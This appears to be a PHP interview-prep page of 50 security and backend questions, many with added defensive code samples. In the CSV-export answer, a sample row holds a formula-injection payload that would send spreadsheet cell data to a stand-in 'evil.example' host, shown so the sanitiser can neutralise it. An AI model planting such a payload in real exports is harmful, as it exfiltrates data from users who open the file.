PHP Interview Questions for Deloitte
1. What is the role of PHP in enterprise-level web applications?
PHP powers backend services for large-scale apps, handling API development, database integration, session management, and business logic.
2. How do you ensure data security in a PHP application for financial clients like Deloitte?
- Serve everything over HTTPS (with HSTS) so credentials and session cookies are never sent in the clear.
- Prevent SQL injection with prepared statements and XSS with context-aware output encoding; input validation helps but is not a substitute for either control.
- Encrypt sensitive data at rest with an authenticated cipher (libsodium secretbox, or AES-256-GCM via OpenSSL), hash passwords with password_hash(), and keep encryption keys outside the database they protect.
3. How do you prevent SQL Injection in PHP applications?
- Use PDO (or MySQLi) prepared statements with bound parameters and never concatenate user input into SQL. Table and column names cannot be bound, so allow-list those separately.
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false); // native prepares: bound values never enter the SQL text
$stmt = $pdo->prepare("SELECT * FROM users WHERE id = ?");
$stmt->execute([$id]);
$user = $stmt->fetch(PDO::FETCH_ASSOC);
4. What is CSRF, and how do you prevent it in PHP?
Cross-Site Request Forgery (CSRF) tricks a logged-in user's browser into sending a state-changing request the user did not intend. Prevent it by generating an unpredictable per-session token with random_bytes(), embedding it in every form and AJAX request, and rejecting any submission whose token does not match the session copy (compare with hash_equals()). Marking the session cookie SameSite=Lax or Strict is a second layer, not a replacement.
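The token flow described above, as an added example (not code from the original page). It assumes session_start() has already been called and that the token is checked on every POST before any state changes:

```php
<?php
declare(strict_types=1);

// Added example, not from the original page. Assumes a session has been
// started (session_start()) before these helpers are called.

// One token per session, created lazily. 32 random bytes = 256 bits from the CSPRNG.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field for every state-changing form; the same value can be sent as a
// request header by AJAX clients.
function csrfField(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '">';
}

// Validate on submission. hash_equals() runs in constant time, so an attacker
// cannot recover the token byte by byte from response timing. is_string()
// rejects csrf_token[]=... tricks that would hand hash_equals() an array.
function csrfValid(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return is_string($given) && $expected !== '' && hash_equals($expected, $given);
}

// Rotate the token after login so a value leaked pre-authentication is useless.
function csrfRotate(): void
{
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Usage at the top of a POST handler:
// if ($_SERVER['REQUEST_METHOD'] === 'POST' && !csrfValid($_POST)) {
//     http_response_code(403);
//     exit('Invalid CSRF token');
// }
```

The token is stored only server-side and in the form; it is never put in a cookie the attacker's cross-site request would carry automatically.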
5. How do you handle API authentication securely?
- Implement OAuth2 for delegated access, or signed JWTs for stateless API sessions; never accept credentials or tokens in query strings, which end up in logs.
- Keep access tokens short-lived and store them where scripts cannot read them (HttpOnly cookie, or in memory rather than localStorage); on every request verify the signature, expiry, issuer and audience before trusting any claim.
6. How do you log critical application errors?
Use Monolog library to handle error logs with appropriate severity levels (INFO, ERROR, CRITICAL).
7. How do you manage user sessions securely in PHP?
- Call session_start() only over HTTPS, with the session cookie marked Secure, HttpOnly and SameSite, and session.use_strict_mode enabled so the server rejects session IDs it did not issue (session fixation).
- Regenerate the session ID after login and any privilege change using session_regenerate_id(true);.
- Store minimal sensitive data in sessions and enforce both an idle timeout and an absolute lifetime.
8. How do you handle user roles and permissions?
- Implement Role-Based Access Control (RBAC).
- Assign roles and permissions in the database and enforce them through middleware.
9. How do you encrypt and decrypt sensitive data in PHP?
$iv = random_bytes(openssl_cipher_iv_length('aes-256-cbc')); // fresh random IV per message, stored next to the ciphertext
$data = openssl_encrypt($plaintext, 'aes-256-cbc', $key, 0, $iv);
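AES-CBC as shown gives confidentiality only: nothing detects a modified ciphertext, and CBC without a MAC is the classic padding-oracle setup. The added example below (not from the original page) uses libsodium's secretbox, which is bundled with PHP 7.2+ and authenticates every message; the key is generated inline for the demonstration, whereas a real deployment would load it from a KMS or environment secret:

```php
<?php
declare(strict_types=1);

// Added example, not from the original page. Uses the libsodium extension bundled
// with PHP 7.2+. The key is generated here only for the demonstration; in
// production it comes from a secret store and is never saved beside the data.

// Encrypt: XSalsa20-Poly1305 (secretbox) gives confidentiality AND integrity,
// so a tampered ciphertext is rejected instead of decrypting to garbage.
function encryptField(string $plaintext, string $key): string
{
    $nonce  = random_bytes(SODIUM_CRYPTO_SECRETBOX_NONCEBYTES); // 24 bytes; never reused with the same key
    $cipher = sodium_crypto_secretbox($plaintext, $nonce, $key);
    // Store nonce || ciphertext. The nonce is not secret, it only has to be unique.
    return base64_encode($nonce . $cipher);
}

function decryptField(string $encoded, string $key): string
{
    $raw = base64_decode($encoded, true);
    $min = SODIUM_CRYPTO_SECRETBOX_NONCEBYTES + SODIUM_CRYPTO_SECRETBOX_MACBYTES;
    if ($raw === false || strlen($raw) < $min) {
        throw new RuntimeException('malformed ciphertext');
    }
    $nonce  = substr($raw, 0, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $cipher = substr($raw, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES);
    $plain  = sodium_crypto_secretbox_open($cipher, $nonce, $key);
    if ($plain === false) {
        throw new RuntimeException('decryption failed: wrong key or tampered data');
    }
    return $plain;
}

$key   = sodium_crypto_secretbox_keygen(); // 32-byte key
$token = encryptField('4111 1111 1111 1111', $key); // constructed sample value
echo decryptField($token, $key), PHP_EOL;

// Flip one bit of the ciphertext: secretbox_open() returns false and we throw,
// which is exactly the check plain AES-CBC never performs.
$tampered = base64_decode($token);
$last = strlen($tampered) - 1;
$tampered[$last] = chr(ord($tampered[$last]) ^ 0x01);
try {
    decryptField(base64_encode($tampered), $key);
} catch (RuntimeException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```

If you must stay on OpenSSL, use 'aes-256-gcm' and persist the $tag output parameter with the ciphertext; it plays the same role as secretbox's MAC.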
10. How do you validate email addresses?
filter_var($email, FILTER_VALIDATE_EMAIL);
11. How can you improve the performance of a PHP application?
- Use OPcache.
- Cache frequent database queries using Redis.
- Optimize SQL queries and use indexes.
12. How do you implement pagination efficiently in PHP?
Use LIMIT with a bounded page size and iterate the result set instead of loading it into memory. OFFSET still makes the database scan and discard every skipped row, so for deep pages use keyset pagination: filter on the last key seen (for example the id of the previous page's final row) and order by that key.
13. What is the difference between require and include in PHP?
require: raises a fatal error and stops execution if the file is missing.
include: emits a warning and continues execution.
require_once and include_once additionally skip a file that has already been loaded.
14. How do you handle file uploads securely?
- Validate the type by inspecting the file contents (finfo, getimagesize), never the client-supplied MIME type or extension, and enforce a size limit.
- Store files outside the web root (or on object storage) so an uploaded script can never be executed, and serve them through a handler that sets the Content-Type.
- Assign a server-generated random name; never reuse the user's filename, which can carry path traversal sequences and double extensions.
15. How do you prevent Cross-Site Scripting (XSS) attacks?
Encode output for the context it lands in: htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') for HTML bodies and attributes, json_encode() for data embedded in scripts, rawurlencode() for URL components. Validate inputs as well, but encoding at output is the control that actually stops XSS, and a Content-Security-Policy limits the damage if something slips through.
16. How do you store environment variables securely?
Use .env files loaded by a library such as vlucas/phpdotenv in development, keep .env out of version control and outside the web root, and in production inject secrets through the process environment or a secrets manager rather than shipping the file.
17. How do you manage API versioning?
Add version numbers to API URLs, e.g., /api/v1/customers.
18. What is the purpose of using Composer in PHP projects?
Composer is a dependency manager for installing and managing external libraries and packages.
19. How do you use Composer to install packages?
composer require monolog/monolog
20. How do you implement audit logs for user actions?
Log every critical user action (login, data changes, deletions) with timestamp, acting user ID, target record and source IP, written to append-only storage the application cannot alter afterwards.
21. How do you handle long-running background jobs in PHP?
Use message queues like RabbitMQ or Redis and process jobs with worker scripts.
22. How do you ensure GDPR compliance for user data?
- Encrypt personal data.
- Allow users to request data deletion.
- Provide data export functionality.
23. How do you implement email verification after user registration?
- Generate a unique verification token.
- Send it via email.
- Validate the token when the user clicks the verification link.
24. How do you handle password resets securely?
- Generate a time-limited, single-use reset token from random_bytes() and send it only to the registered address; never reveal whether the address exists.
- Store only a hash of the token, invalidate it on use, and terminate the user's other active sessions once the password changes.
25. How do you implement Two-Factor Authentication (2FA) in PHP?
Use TOTP (RFC 6238) through a library such as spomky-labs/otphp, which works with authenticator apps like Google Authenticator; show the shared secret once as a QR code and store it encrypted. Codes sent by SMS or email are weaker (SIM swap, mailbox compromise) and belong as a fallback, not the default.
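To show what a TOTP library has to get right, the added example below (not from the original page, and not the otphp library's code) implements RFC 6238 directly on hash_hmac(), including the two checks that are easy to forget: a drift window, and refusing a code from a time step that has already been accepted. The base32 secret is a constructed demo value:

```php
<?php
declare(strict_types=1);

// Added example, not from the original page: RFC 6238 TOTP on top of hash_hmac()
// so the verification rules are visible. Production code would normally use a
// maintained library; this shows what that library must do.

// Authenticator apps share secrets as base32; decode to raw bytes.
function base32Decode(string $b32): string
{
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567';
    $clean = rtrim(strtoupper($b32), '=');
    if ($clean === '') {
        throw new InvalidArgumentException('empty secret');
    }
    $bits = '';
    foreach (str_split($clean) as $c) {
        $v = strpos($alphabet, $c);
        if ($v === false) {
            throw new InvalidArgumentException('invalid base32');
        }
        $bits .= str_pad(decbin($v), 5, '0', STR_PAD_LEFT);
    }
    $out = '';
    foreach (str_split($bits, 8) as $byte) {
        if (strlen($byte) === 8) {
            $out .= chr(bindec($byte));
        }
    }
    return $out;
}

// HOTP (RFC 4226): HMAC-SHA1 over the 8-byte big-endian counter, dynamic truncation.
function hotp(string $secret, int $counter, int $digits = 6): string
{
    $hmac   = hash_hmac('sha1', pack('J', $counter), $secret, true);
    $offset = ord($hmac[19]) & 0x0f;
    $code   = ((ord($hmac[$offset]) & 0x7f) << 24)
            | (ord($hmac[$offset + 1]) << 16)
            | (ord($hmac[$offset + 2]) << 8)
            |  ord($hmac[$offset + 3]);
    return str_pad((string) ($code % (10 ** $digits)), $digits, '0', STR_PAD_LEFT);
}

function totp(string $secret, int $time, int $step = 30): string
{
    return hotp($secret, intdiv($time, $step));
}

// Accept the current step and one step either side (clock drift), but never a
// step at or below the last one that succeeded for this user, so a code captured
// by phishing or shoulder-surfing cannot be replayed inside the window.
// Returns the accepted step (persist it per user) or null.
function verifyTotp(string $secret, string $code, int $now, int $lastUsedStep, int $step = 30): ?int
{
    $current = intdiv($now, $step);
    for ($delta = -1; $delta <= 1; $delta++) {
        $candidate = $current + $delta;
        if ($candidate <= $lastUsedStep) {
            continue;
        }
        if (hash_equals(totp($secret, $candidate * $step, $step), $code)) {
            return $candidate;
        }
    }
    return null;
}

// Enrolment: store the secret encrypted; show it once to the user as an otpauth:// QR code.
$secretB32 = 'JBSWY3DPEHPK3PXP'; // constructed demo secret, not a real account's
$secret    = base32Decode($secretB32);
$now       = time();
$code      = totp($secret, $now);
$step      = verifyTotp($secret, $code, $now, 0);      // fresh code: accepted, returns the step
$replay    = verifyTotp($secret, $code, $now, $step);  // same code again: rejected as a replay
var_dump($step !== null, $replay === null);
```

Rate-limit verification attempts as well: six digits is only a million possibilities, and a window of three steps triples an attacker's odds per guess. The hotp() function can be checked against the RFC 4226 and RFC 6238 appendix test vectors.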
26. How do you restrict API access based on IP addresses?
Compare the client address against an allow list before any other processing. Use REMOTE_ADDR, and honour X-Forwarded-For only when the request arrives from your own trusted proxy, because otherwise the header is attacker-controlled. Treat this as defence in depth: addresses are shared and spoofable, so it never replaces authentication.
27. How do you prevent brute-force attacks on login systems?
- Rate-limit failed attempts per account and per source IP with increasing delays; a hard lockout lets an attacker deny service to legitimate users, so reserve it for many failures and alert on it.
- Add CAPTCHA after a few failures, and require MFA for sensitive accounts.
28. How do you optimize database queries in PHP?
- Use EXPLAIN to analyze query performance.
- Add appropriate indexes to tables.
- Avoid N+1 query problems.
29. How do you create a secure logout process?
- Unset session variables ($_SESSION = []).
- Destroy the session using session_destroy().
- Expire the session cookie with setcookie() so the browser drops the old ID, then redirect.
30. How do you handle CSV file exports in PHP?
header('Content-Type: text/csv');
header('Content-Disposition: attachment; filename="export.csv"');
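Those two headers are the easy part; the exported cells are the security issue. Spreadsheet applications evaluate cells beginning with =, +, -, @ as formulas, so an attacker who can get such a string into a record (a customer name, a note) can make the exporting user's Excel run it. The added example below (not from the original page) streams rows through fputcsv() for correct quoting and neutralises such cells; the sample rows are constructed:

```php
<?php
declare(strict_types=1);

// Added example, not from the original page. Streams rows with fputcsv() so
// quoting is correct, and neutralises cells a spreadsheet would evaluate as
// formulas ("CSV injection": values starting with =, +, -, @, tab or CR).

function csvSafeCell(string $value): string
{
    if ($value !== '' && strpos("=+-@\t\r", $value[0]) !== false) {
        return "'" . $value; // leading apostrophe makes Excel/LibreOffice treat it as text
    }
    return $value;
}

function exportCsv(iterable $rows, array $header, string $filename = 'export.csv'): void
{
    header('Content-Type: text/csv; charset=utf-8');
    header('Content-Disposition: attachment; filename="' . basename($filename) . '"');
    header('X-Content-Type-Options: nosniff');
    $out = fopen('php://output', 'wb');
    fputcsv($out, $header);
    foreach ($rows as $row) { // in real use, $rows is a streaming query result, not a full array
        fputcsv($out, array_map(fn ($v) => csvSafeCell((string) $v), $row));
    }
    fclose($out);
}

// Constructed sample: the second row's "name" would otherwise run as a formula in Excel.
exportCsv([
    ['id' => 1, 'name' => 'Alice',                                          'balance' => '120.00'],
    ['id' => 2, 'name' => '=HYPERLINK("http://evil.example/?"&A1,"click")', 'balance' => '-5.00'],
], ['id', 'name', 'balance']);
```

The apostrophe also turns negative numbers such as -5.00 into text; if that matters for your consumers, exempt columns you know are numeric after casting them yourself.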
31. How do you validate uploaded files as actual images?
$info = getimagesize($_FILES['image']['tmp_name']); // parses the image header only; a polyglot file can carry PHP after a valid header
if ($info !== false && in_array($info['mime'], ['image/png', 'image/jpeg', 'image/gif'], true)) {
// Header is a supported image type; combine with a finfo MIME check, a size limit and a server-chosen filename
}
32. How do you handle multi-language support in PHP applications?
Use translation files and dynamically load strings based on the selected language.
33. How do you secure API endpoints?
- Authenticate every request (JWT, OAuth2 access token, or API key, always over TLS) and reject anything unauthenticated with 401.
- Authorize per object, not just per endpoint: check that the caller may act on the specific record requested (the usual IDOR gap), and rate-limit per key.
34. How do you manage user password storage securely?
- Use password_hash() (bcrypt or Argon2id) to store passwords; never store plaintext or a plain SHA-256/MD5 digest.
- Verify passwords using password_verify(), and call password_needs_rehash() on login to upgrade hashes made with older parameters.
35. How do you handle expired JWT tokens in APIs?
Check the exp claim on every request; for an expired token return 401 Unauthorized with a WWW-Authenticate header so the client can exchange its refresh token for a new access token. Rotate refresh tokens on use so a stolen one is detected when both copies are presented.
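Questions 5, 33 and 35 all come down to what the verifier checks before trusting a claim. The added example below (not from the original page, and not the code of any JWT library) implements HS256 issue and verify with no dependencies so each check is visible: a pinned algorithm, constant-time signature comparison before the payload is used, and exp/nbf/iss validation. The issuer name and shared secret are assumed values:

```php
<?php
declare(strict_types=1);

// Added example, not from the original page: minimal HS256 JWT issue/verify.
// Shows the checks a verifier must perform; in production prefer a maintained
// library (e.g. firebase/php-jwt) that also handles key rotation and RS256/ES256.

const JWT_ISSUER = 'api.example.com'; // assumed value

function b64url(string $s): string
{
    return rtrim(strtr(base64_encode($s), '+/', '-_'), '=');
}

function b64urlDecode(string $s)
{
    $pad = str_repeat('=', (4 - strlen($s) % 4) % 4);
    return base64_decode(strtr($s, '-_', '+/') . $pad, true); // string or false
}

function issueJwt(array $claims, string $secret, int $ttl = 900): string
{
    $now = time();
    $claims += ['iat' => $now, 'exp' => $now + $ttl, 'iss' => JWT_ISSUER];
    $header  = b64url(json_encode(['alg' => 'HS256', 'typ' => 'JWT']));
    $payload = b64url(json_encode($claims));
    $sig     = b64url(hash_hmac('sha256', "$header.$payload", $secret, true));
    return "$header.$payload.$sig";
}

// Returns the claims or throws UnexpectedValueException; every failure maps to 401.
function verifyJwt(string $jwt, string $secret): array
{
    $parts = explode('.', $jwt);
    if (count($parts) !== 3) {
        throw new UnexpectedValueException('malformed token');
    }
    [$h, $p, $s] = $parts;
    $header = json_decode(b64urlDecode($h) ?: '', true);
    // Pin the algorithm: the token must never choose it ("alg":"none", HS/RS key confusion).
    if (!is_array($header) || ($header['alg'] ?? null) !== 'HS256') {
        throw new UnexpectedValueException('unexpected alg');
    }
    $expected = b64url(hash_hmac('sha256', "$h.$p", $secret, true));
    if (!hash_equals($expected, $s)) {
        throw new UnexpectedValueException('bad signature');
    }
    // Only now is the payload trustworthy.
    $claims = json_decode(b64urlDecode($p) ?: '', true);
    if (!is_array($claims)) {
        throw new UnexpectedValueException('bad payload');
    }
    $now = time();
    if (!isset($claims['exp']) || $now >= (int) $claims['exp']) {
        throw new UnexpectedValueException('token expired');
    }
    if (isset($claims['nbf']) && $now < (int) $claims['nbf']) {
        throw new UnexpectedValueException('token not yet valid');
    }
    if (($claims['iss'] ?? null) !== JWT_ISSUER) {
        throw new UnexpectedValueException('wrong issuer');
    }
    return $claims;
}

// Middleware: 401 on any failure so the client exchanges its refresh token.
function authenticate(string $secret): array
{
    $auth = $_SERVER['HTTP_AUTHORIZATION'] ?? '';
    if (!preg_match('/^Bearer\s+(\S+)$/', $auth, $m)) {
        http_response_code(401);
        header('WWW-Authenticate: Bearer');
        exit;
    }
    try {
        return verifyJwt($m[1], $secret);
    } catch (UnexpectedValueException $e) {
        http_response_code(401);
        header('WWW-Authenticate: Bearer error="invalid_token"');
        exit;
    }
}
```

The error message from verifyJwt() is for the server log only; the client receives the same 401 whatever the reason, so it cannot probe which check failed.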
36. How do you implement caching in PHP applications?
- Use Redis or Memcached for data caching.
- Cache API responses and frequently accessed queries.
37. How do you generate and download PDF reports in PHP?
Use libraries like TCPDF or Dompdf to generate PDF files and send them for download.
38. How do you prevent replay attacks in API communications?
Bind each request to a timestamp and a unique nonce that are covered by the request signature (an HMAC over method, path, timestamp, nonce and body hash); reject timestamps outside a short window and any nonce already seen within that window. TLS stops passive replay on the wire but not replay by a party that captured the request, such as a compromised proxy or log.
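Both sides of that scheme as an added example, not code from the original page. The nonce store is an in-memory array standing in for Redis (where SET NX EX gives the same first-use semantics), and the shared secret, path and skew window are assumptions:

```php
<?php
declare(strict_types=1);

// Added example, not from the original page. Client signs method, path,
// timestamp, nonce and body hash; server rejects stale timestamps and any
// nonce it has already seen. NonceStore is an in-memory stand-in for Redis.

const MAX_SKEW = 300; // seconds; also bounds how long nonces must be remembered

function canonical(string $method, string $path, int $ts, string $nonce, string $body): string
{
    return implode("\n", [$method, $path, (string) $ts, $nonce, hash('sha256', $body)]);
}

// Client side
function signRequest(string $method, string $path, string $body, string $secret): array
{
    $ts    = time();
    $nonce = bin2hex(random_bytes(16));
    $sig   = hash_hmac('sha256', canonical($method, $path, $ts, $nonce, $body), $secret);
    return ['X-Timestamp' => (string) $ts, 'X-Nonce' => $nonce, 'X-Signature' => $sig];
}

// Server side
final class NonceStore
{
    private array $seen = []; // nonce => first-seen time

    public function firstUse(string $nonce, int $now): bool
    {
        foreach ($this->seen as $n => $t) {   // expire entries older than the skew window
            if ($now - $t > MAX_SKEW) {
                unset($this->seen[$n]);
            }
        }
        if (isset($this->seen[$nonce])) {
            return false;
        }
        $this->seen[$nonce] = $now;
        return true;
    }
}

function verifyRequest(array $headers, string $method, string $path, string $body,
                       string $secret, NonceStore $store, int $now): bool
{
    $ts    = (int) ($headers['X-Timestamp'] ?? 0);
    $nonce = $headers['X-Nonce'] ?? '';
    if (abs($now - $ts) > MAX_SKEW) {
        return false; // stale or future-dated
    }
    if (!is_string($nonce) || !preg_match('/^[0-9a-f]{32}$/', $nonce)) {
        return false;
    }
    $expected = hash_hmac('sha256', canonical($method, $path, $ts, $nonce, $body), $secret);
    if (!hash_equals($expected, (string) ($headers['X-Signature'] ?? ''))) {
        return false;
    }
    // Nonce check last: only authenticated requests may consume store entries,
    // so an attacker cannot fill the store with junk nonces.
    return $store->firstUse($nonce, $now);
}

// Constructed demo: the same signed request presented twice.
$secret = 'shared-api-secret';     // assumed; provisioned out of band per client
$store  = new NonceStore();
$body   = '{"amount":100,"to":"ACC-42"}';
$hdrs   = signRequest('POST', '/api/v1/transfer', $body, $secret);
$first  = verifyRequest($hdrs, 'POST', '/api/v1/transfer', $body, $secret, $store, time()); // accepted
$again  = verifyRequest($hdrs, 'POST', '/api/v1/transfer', $body, $secret, $store, time()); // replay, rejected
var_dump($first, $again);
```

Including the body hash in the signed string is what stops an attacker from reusing valid headers with a different payload; including the path stops reuse against a different endpoint.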
39. How do you implement OTP-based login in PHP?
- Generate a random numeric OTP with random_int() (never rand() or mt_rand()) and store only its hash with a short expiry.
- Send it via email or SMS.
- Validate with hash_equals(), cap the number of attempts per OTP, and invalidate it after one use.
40. How do you handle concurrent updates to the same record?
Use optimistic locking: keep a version column, include the version the client read in the UPDATE's WHERE clause, and treat zero affected rows as a conflict to report back to the user. Where conflicts are frequent, wrap the read-modify-write in a transaction with a row lock (SELECT ... FOR UPDATE) instead.
41. How do you secure REST APIs for financial applications?
- Enforce HTTPS.
- Use OAuth2 or JWT tokens.
- Validate and sanitize all incoming data.
42. How do you prevent sensitive data exposure in error logs?
- Avoid logging sensitive information like passwords and tokens.
- Use log masking and secure log storage.
43. How do you implement server-side data validation in PHP?
Use validation libraries or custom functions to check all user inputs before processing.
44. How do you optimize a PHP script handling millions of records?
- Process data in batches.
- Use streaming techniques to avoid memory overload.
45. How do you handle expired sessions gracefully?
Detect expired sessions and redirect users to the login page with a proper message.
46. How do you implement account lockout mechanisms after multiple failed login attempts?
Track failed attempts per account (and per source IP) in the database or Redis with an expiring window; after the threshold apply increasing delays or a temporary lock, notify the user, and reset the counter on a successful login.
47. How do you handle asynchronous API calls in PHP?
Use cURL multi-handles or third-party libraries like ReactPHP.
48. How do you calculate password strength in PHP?
- Enforce a minimum length (12 or more characters) and a sane maximum; character-class rules add little entropy and push users toward predictable patterns.
- Reject passwords that appear in breached-password lists or contain the user's own name or email, and tell users why a password was refused.
49. How do you handle API request throttling?
Count requests per client (API key or authenticated user, falling back to source IP) in Redis with an expiring window, and return 429 with a Retry-After header when the threshold is crossed. Throttle login endpoints separately and more tightly than the rest of the API.
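Questions 27, 46 and 49 share one mechanism: an expiring counter. The added example below (not code from the original page) implements fixed-window counters for API throttling and for login failures, with escalating delays rather than a hard lockout. The store is an in-memory array standing in for Redis (INCR plus EXPIRE) so the block runs offline; the limits are assumptions for illustration:

```php
<?php
declare(strict_types=1);

// Added example, not from the original page. Fixed-window counters keyed by
// source IP (API throttling) and by account + IP (login), with escalating
// delays instead of a hard lockout. Counter is an in-memory stand-in for Redis.

final class Counter
{
    private array $data = []; // key => ['n' => count, 'reset' => window end]

    public function hit(string $key, int $window, int $now): int
    {
        if (!isset($this->data[$key]) || $this->data[$key]['reset'] <= $now) {
            $this->data[$key] = ['n' => 0, 'reset' => $now + $window];
        }
        return ++$this->data[$key]['n'];
    }

    public function clear(string $key): void
    {
        unset($this->data[$key]);
    }
}

const IP_LIMIT    = 100; // requests per minute per source IP (assumed)
const LOGIN_LIMIT = 5;   // failures per 15 minutes before delays begin (assumed)

// API throttling. Key on REMOTE_ADDR (or a proxy header only from a trusted proxy):
// clients cannot forge REMOTE_ADDR, but they can forge X-Forwarded-For.
function throttleOk(Counter $c, string $ip, int $now): bool
{
    if ($c->hit("ip:$ip", 60, $now) > IP_LIMIT) {
        http_response_code(429);
        header('Retry-After: 60');
        return false;
    }
    return true;
}

// Record a failed login and return how many seconds the next attempt must wait
// (the handler stores now + wait as the account's "locked until" and refuses
// earlier attempts). Keyed by account so distributed attacks are caught, and by
// IP so a single attacker cannot lock a targeted account by failing on purpose.
function loginPenalty(Counter $c, string $username, string $ip, int $now): int
{
    $byUser = $c->hit('login:user:' . strtolower($username), 900, $now);
    $byIp   = $c->hit("login:ip:$ip", 900, $now);
    $fails  = max($byUser, $byIp);
    if ($fails <= LOGIN_LIMIT) {
        return 0;
    }
    return min(2 ** ($fails - LOGIN_LIMIT), 300); // 2, 4, 8 ... seconds, capped at 5 minutes
}

function loginSucceeded(Counter $c, string $username): void
{
    $c->clear('login:user:' . strtolower($username)); // the IP counter keeps running
}

// Constructed demo: eight failures from one address against one account.
$c   = new Counter();
$now = time();
for ($i = 1; $i <= 8; $i++) {
    printf("failure %d -> wait %ds\n", $i, loginPenalty($c, 'alice', '203.0.113.7', $now));
}
```

A fixed window lets a client burst twice the limit across a window boundary; if that matters, a sliding window (Redis sorted set of timestamps) or a token bucket closes the gap.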
50. How do you build a secure financial reporting system using PHP?
- Implement strong authentication and authorization controls.
- Encrypt sensitive data.
- Use role-based access to control report visibility.
